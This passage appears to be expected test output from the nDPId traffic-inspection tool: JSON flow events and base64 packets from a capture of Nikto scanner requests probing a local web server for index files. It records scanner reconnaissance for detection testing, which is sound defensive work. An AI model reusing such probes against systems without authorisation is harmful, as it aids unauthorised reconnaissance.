{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1576420276807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276807,"pkt":"AAAAAAAAAAAAAAAACABFAADHnVlAAEAGntV\/AAABfwAAAcJAH5BrmKVmTh6XdYAYAED+uwAAAQEICp1m+2+dZvtvR0VUIC9pbmRleC5waHA1IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1576420276809,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276809,"pkt":"AAAAAAAAAAAAAAAACABFAADHz9VAAEAGbFl\/AAABfwAAAcJCH5Dtpvfi4owoVYAYAED+uwAAAQEICp1m+3GdZvtwR0VUIC9pbmRleC5waHA3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1576420276810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276810,"pkt":"AAAAAAAAAAAAAAAACABFAADH5lRAAEAGVdp\/AAABfwAAAcJEH5B9+95hKQN6FIAYAED+uwAAAQEICp1m+3KdZvtyR0VUIC9pbmRleC5odG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1576420276812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276812,"pkt":"AAAAAAAAAAAAAAAACABFAADGlhlAAEAGphZ\/AAABfwAAAcJGH5DYta4lttm384AYAED+ugAAAQEICp1m+3OdZvtzR0VUIC9pbmRleC5odG0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1576420276813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276813,"pkt":"AAAAAAAAAAAAAAAACABFAADI2h9AAEAGYg5\/AAABfwAAAcJIH5At6uIveFvtbIAYAED+vAAAAQEICp1m+3WdZvt1R0VUIC9pbmRleC5zaHRtbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1576420276815,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276815,"pkt":"AAAAAAAAAAAAAAAACABFAADGtzZAAEAGhPl\/AAABfwAAAcJKH5BukY8IX6sJe4AYAED+ugAAAQEICp1m+3edZvt2R0VUIC9pbmRleC5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1576420276817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276817,"pkt":"AAAAAAAAAAAAAAAACABFAADGzfJAAEAGbj1\/AAABfwAAAcJMH5CEyfXFi\/ZWqoAYAED+ugAAAQEICp1m+3mdZvt5R0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1576420276819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276819,"pkt":"AAAAAAAAAAAAAAAACABFAADFj3JAAEAGrL5\/AAABfwAAAcJOH5DAfLdF0MycV4AYAED+uQAAAQEICp1m+3udZvt7R0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1576420276820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276820,"pkt":"AAAAAAAAAAAAAAAACABFAADG77xAAEAGTHN\/AAABfwAAAcJQH5DIa9eQqgE4nYAYAED+ugAAAQEICp1m+3ydZvt8R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1576420276821,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276821,"pkt":"AAAAAAAAAAAAAAAACABFAADHQ2dAAEAG+Md\/AAABfwAAAcJSH5BEZHtRsCeOn4AYAED+uwAAAQEICp1m+32dZvt9R0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCg0K"} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1576420276823,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276823,"pkt":"AAAAAAAAAAAAAAAACABFAADI9WNAAEAGRsp\/AAABfwAAAcJUH5Atl81VKdEVGoAYAED+vAAAAQEICp1m+3+dZvt\/R0VUIC9kZWZhdWx0LmFzcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 